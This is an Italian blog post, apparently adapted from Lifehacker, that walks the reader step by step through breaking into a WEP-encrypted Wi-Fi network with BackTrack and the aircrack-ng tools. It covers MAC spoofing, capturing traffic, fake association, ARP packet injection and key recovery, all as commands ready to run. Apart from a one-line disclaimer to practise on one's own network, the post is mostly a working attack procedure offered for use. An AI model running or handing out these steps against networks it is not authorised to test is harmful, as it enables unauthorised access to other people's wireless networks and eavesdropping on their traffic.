Al giorno d’oggi è noto che per mettere in sicurezza la tua rete domestica senza fili non puoi usare la cifratura WEP perchè è debolmente protetta da potenziali attacchi. Ma quanto è facile? Lo scoprirai con questa guida..
In questa guida verrà descritto come violare passo passo una rete Wi-Fi con cifratura WEP attiva. Prima di continuare solo una parola: la conoscenza è potere ma questo non significa che si è liberi di fare cio che è illegale. Assicurati di provare le operazioni descritte in questa guida sulla tua rete di casa.

Di cosa hai bisogno

Prima di tutto prepara il necessario:

1. Un adattatore di rete WiFi compatibile: questo è un requisito molto importante. Hai bisogno di un adattatore che sia compatibile con l’iniezione dei pacchetti. Se la scheda del tuo computer non lo è ti consiglio di acquistare un Alfa AWUS036H USB su Amazon;
2. BackTrack Live CD: è una distribuzione Linux con tutti gli strumenti per i veri hacker e per gli esperti di sicurezza informatica. Ti basterà scaricare la distribuzione ed eseguirla live o in virtual machine sul tuo computer per andare bene;
3. Una rete Wi-Fi con protezione WEP raggiungibile: possibilmente la qualità del segnale dovrebbe essere buona;
4. Pazienza con la linea di comando: questa guida richiederà la digitazione di una serie di comandi a volte di difficile comprensione per poi a volte attendere i dati in ricezione che impiegherà del tempo. Dovrai essere paziente.

Rompi la rete

Per cominciare lancia il terminale e lancia arimon-ng:

airmon-ng

Questo comando ti mostrerà le interfacce di rete trovate. Nel nostro caso l’unica corretta è ra0. La tua potrebbe avere un nome differente, prendine nota e sostituisci quel nome in tutti i comandi successivi al posto del termine interfaccia.

Ora lancia il prossimo comando e guarda l’output che abbiamo ottenuto con la nostra prova:

airmon-ng stop interfaccia
ifconfig interfaccia down

macchanger –mac 00:11:22:33:44:55 interfaccia

airmon-ng start interfaccia

(clicca sulla foto per ingrandire)

Ora che i preparativi sono finiti, digita:

airodump-ng interfaccia

Questo ti permette di vedere la lista di reti Wi-Fi raggiungibile intorno a te, quando trovi la tua digita Ctrl+C per fermare la ricerca. Evidenzia la linea relativa alla tua rete e prendi nota di: BSSID e il numero del canale (nella colonna CH).

Sniff dei pacchetti

Adesso comincia a sniffare pacchetti da questa rete con:

airodump-ng -c canale -w file_di_output –bssid bssid interfaccia

utilizza un nome file attinente alla rete che stai crackando che ti servirà nelle prossime fasi.

Ora lasciando aperta questa, apri una nuova finestra e digita:

aireplay-ng -1 0 -a bssid -h 00:11:22:33:44:55 -e essid interfaccia

con essid si intende proprio il nome della rete che stai crackando.

Dopo questo comando perchè tutto stia funzionando correttamente dovrai ricevere il messaggio “Association successful” con la faccina sorridente che vedi nella schermata qui sotto.

Ci siamo quasi…

Adesso è il momento di lanciare un ultimo comando prima di concederci una tazza di caffè. La cattura dei pacchetti necessari per crackare la rete richiederà alcuni minuti durante i quali il numero della colonna #Data crescerà.

aireplay-ng -3 -b bssid file_di_output.cap -h 00:11:22:33:44:55 interfaccia

Dovrai attendere finche non sarà pari almeno a 10.000 (mentre nella foto sottostante è solo a 854).

Ora che hai raccolto un numero sufficiente di dati è il momento della verità! Lancia una terza console e digita il seguente comando per crackare i dati che hai catturato:

aircrack-ng -b bssid file_di_output.cap

Se non hai catturato un numero sufficiente di dati la procedura fallirà. Se invece è sufficiente otterrai una schermata come la seguente:

Collegati con la chiave trovata!

[via|lifehacker.com]

• Pin It
• Share
• Tweet